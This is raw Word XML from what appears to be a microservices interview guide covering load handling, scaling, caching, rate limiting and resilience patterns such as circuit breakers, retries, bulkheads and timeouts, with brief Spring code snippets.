      </w:r>
    </w:p>
    <w:p w14:paraId="5506AF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for centralized authentication and authorization (e.g., OAuth2, JWT tokens), encrypt communication (e.g., using TLS), and follow best security practices such as least-privilege access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7C542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A166D63">
          <v:rect id="_x0000_i3082" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B4419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Network Latency and Fault Tolerance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464522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a distributed system, microservices communicate over the network, which can introduce latency and potential service failures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654306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esponse time, service downtime, or cascading failures if one service becomes unavailable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576F4E1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fault tolerance mechanism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fallback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timeouts</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Use asynchronous communication patterns (e.g.,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for decoupling services and reducing synchronous dependency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64143ED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96F5A0A">
          <v:rect id="_x0000_i3083" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BCBB6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Discovery and Load Balancing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6EB98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ultiple services, keeping track of where each service is running and distributing requests efficiently can become complex.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CF8E9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y in managing dynamic scaling, service availability, and routing requests to the appropriate instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9CF8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service discovery</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> using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and integrate with </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>load balancers</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to ensure requests are routed to the right service instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E652A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FDDFAD6">
          <v:rect id="_x0000_i3084" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FE022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1. Dependency Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A6379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anaging dependencies between services can be tricky, especially when services have versioning and compatibility issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DAF5B0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Hard to manage backward compatibility and maintainability of the services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B43AD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versioning strategies</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for APIs (e.g., semantic versioning) and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to abstract and manage dependencies. Implement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to ensure interface compatibility.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5F1E8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1ECCF58">
          <v:rect id="_x0000_i3085" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="32240FE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2. Service Duplication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8283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microservices, each service might implement a similar function, leading to duplication of business logic or data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260198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maintenance burden and potential inconsistencies in service behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2634EFA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Centralize common functionality into shared libraries or services. Promote reusability and avoid code duplication through </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>shared service patterns</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DA4A6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4DB1027">
          <v:rect id="_x0000_i3086" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C64695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3. Organizational Challenges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632A23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A shift in team culture, communication overhead, and challenges in skill gaps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E396D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Promote a culture of cross-functional teams, ensure training and upskilling, and foster collaboration between teams responsible for different microservices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671FC26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3076FF4">
          <v:rect id="_x0000_i3087" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4871B7A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4. Cost Overhead</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9F00B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require additional infrastructure to manage deployments, scaling, and communication. This often leads to higher operational costs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67EA78A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infrastructure and operational complexity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29230C7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ainerization</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., Docker, Kubernetes) to reduce infrastructure costs and improve scalability. Optimize resource utilization and minimize overhead by using </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>serverles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FaaS (Function-as-a-Service)</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> models where applicable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A1DF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F5E9790">
          <v:rect id="_x0000_i3088" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D03AE9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14E61C0" w14:textId="77777777" w:rsidR="00312742" w:rsidRPr="00CE4B95" w:rsidRDefault="00312742" w:rsidP="00FA65E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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3089" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD95D9D" w14:textId="3FC7261F" w:rsidR="001659D4" w:rsidRPr="00CE4B95" w:rsidRDefault="00AF4871">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="730" w:name="_Toc197867944"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How are you handling load in your microservices</w:t>
      </w:r>
      <w:r w:rsidR="001659D4" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="730"/>
    </w:p>
    <w:p w14:paraId="0B59B93D" w14:textId="2BE9A7B5" w:rsidR="00A53A4A" w:rsidRPr="00FA65E9" w:rsidRDefault="00A53A4A"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Horizontal Scaling (Auto-scaling)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFFDB2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his involves adding more instances of a service to distribute the load across multiple instances. It's one of the most common ways to handle load in microservices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B86FC13"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481326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container orchestration tools like </w:t>
      </w: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ocker Swarm</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to manage and scale services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B768609"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uto-scaling policies based on CPU usage, memory usage, or request count to scale the microservices up or down automatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D00D61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services</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> like AWS, Azure, or GCP offer auto-scaling features as part of their managed services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242233DB"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Load Balancing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2C2A0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Load balancing helps distribute incoming requests to multiple instances of a service to ensure no single instance is overwhelmed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C54533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A09193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Use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for routing and load balancing requests to backend microservices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A18D0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Round-Robin</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Least Connections</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> algorithms in load balancer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HAProxy</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, or cloud-based load balancing solutions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351524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can also be done at the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level, e.g., using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 which provides sophisticated routing and traffic management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072989AE"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aching</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F937D0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aching reduces the load on microservices by storing frequently accessed data in memory, reducing the need for repetitive computations or database queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382F49F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0935177F"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distributed cache systems like </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Redi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mcached</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to cache frequently accessed data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D30E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HTTP caching</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> headers (e.g., Cache-Control) can be used to cache responses on the client side or API Gateway.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD84510"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content delivery networks (CDN)</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for static content to offload requests from the backend servers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DE4D47"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Asynchronous Communication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79478E2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0C22DBD"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ctiveMQ</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to send messages between services asynchronously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74617C6E"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event-driven</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> architectures where services communicate via events, reducing synchronous dependencies and improving overall throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AEF80D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rcuit Breakers and Fault Tolerance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312DD1AE"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o prevent a single failing service from impacting others, circuit breakers allow services to degrade gracefully when they detect a failure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D1CE7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CE96A7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Hystrix</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to implement circuit breakers in your microservices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A53D0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ircuit breakers monitor the health of a service and "open" the circuit to stop requests from reaching a failing service, preventing cascading failures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B23166C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C20281F"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AC8B9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Zookeeper</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to enable dynamic service registration and discovery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F736063"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client application queries the service registry to route requests to the appropriate service instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0845BBF1"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Rate Limiting and Throttling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7647B75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Rate limiting prevents overloading microservices by controlling the number of requests that can be made within a specific time period.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38512D3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40823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rate-limiting in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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECFDB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Bucket4j</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in Spring Boot for rate-limiting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1736226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fine usage policies for consumers to ensure fair usage and to protect critical services from being overwhelmed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D22EBF"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harding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245815C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Sharding involves splitting large datasets across multiple databases or instances to distribute the load.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624741B6"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62B0D09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database sharding techniques where data is partitioned based on certain keys (e.g., user ID, product ID).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343EF2C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n NoSQL databases like </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Cassandr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ongoDB</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, data sharding is typically built-in.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF529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relational databases, sharding can be done at the application level or through database clusters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7149698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nd Alerting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2861908C"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onstant monitoring allows you to track system load, bottlenecks, and performance issues in real-time, enabling proactive load handling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F3092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23B1E8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monitoring using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for tracking system metrics like response times, request rates, and error rates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B294CA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t up </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>alerting</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in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notify when certain thresholds (e.g., high latency, error rate) are breached, allowing teams to take action.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6E807A"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10. Graceful Shutdown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C43B20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Properly handling load during service shutdowns (due to scaling down or deployment) ensures that there’s no sudden disruption or dropped traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C123539"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190B4D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Configure your microservices to drain traffic and complete any in-progress requests before shutting down, a process commonly referred to as </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>graceful shutdown</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5776232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pring Boot, this can be achieved by configuring the shutdown timeout and ensuring that services complete their tasks before terminating.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2F45A3"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28F807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sz w:val="22"/>
          <w:szCs w:val="22"/>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3090" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F8F616" w14:textId="62959BC8" w:rsidR="001659D4" w:rsidRPr="00CE4B95" w:rsidRDefault="00AF4871">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="731" w:name="_Toc197867945"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How will you handle resilience and fault tolerance in microservice</w:t>
      </w:r>
      <w:r w:rsidR="001659D4" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="731"/>
    </w:p>
    <w:p w14:paraId="22DD55F6" w14:textId="0ED4B325" w:rsidR="00F25965" w:rsidRPr="00FA65E9" w:rsidRDefault="00F25965"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To handle </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>resilience</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fault tolerance</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in microservices, we use design patterns, tools, and libraries that help services degrade gracefully during failures, avoid cascading issues, and recover automatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203776A4"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2D7D99D">
          <v:rect id="_x0000_i3091" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACF34DE"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Key Techniques for Resilience and Fault Tolerance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2BE07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C42026">
          <v:rect id="_x0000_i3092" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="104F41C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ircuit Breaker Pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9BFFA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event repeated calls to a failing service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AABB3F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Hystrix (deprecated).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6824B03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289673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failures exceed a threshold, the circuit "opens" and requests fail fast.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C49105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fter a timeout, it allows limited traffic to test recovery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A04499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Breaker(name = "myService", fallbackMethod = "fallbackMethod")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018744D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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6823E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restTemplate.getForObject("http://example-service/data", String.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F351E5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3D8FBD8" w14:textId="77777777" w:rsidR="00F25965" w:rsidRPr="00FA65E9" w:rsidRDefault="00F25965" w:rsidP="00FA65E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06424EF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fallbackMethod(Exception e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DBDD6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Service temporarily unavailable";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C98E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006A264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12098E">
          <v:rect id="_x0000_i3093" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="034A0446"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Retry Pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4992AC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Retry failed calls a specified number of times before failing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF2684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Spring Retry.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6096A50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name = "myService", fallbackMethod = "fallbackMethod")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E471EA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WithRetry() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5970676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retryable logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483AC5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1AD7633"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7054575">
          <v:rect id="_x0000_i3094" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="469C4F7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Rate Limiter / Bulkhead Pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A1EA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ate Limiter</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Limits requests per time window to prevent overload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9D537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ulkhead</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Isolates failures so one part doesn't affect others (like compartments in a ship).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319896A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D7B5D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Limiter(name = "myService")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F67F60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name = "myService", type = Bulkhead.Type.THREADPOOL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5255A31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466E2C">
          <v:rect id="_x0000_i3095" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5D6BD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Timeouts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFFC8F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Fail fast when dependent service is taking too long.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCD70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w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Configure HTTP client (e.g., RestTemplate, WebClient) with timeout.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436AE7A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tTemplateBuilder builder = new RestTemplateBuilder()</w:t>
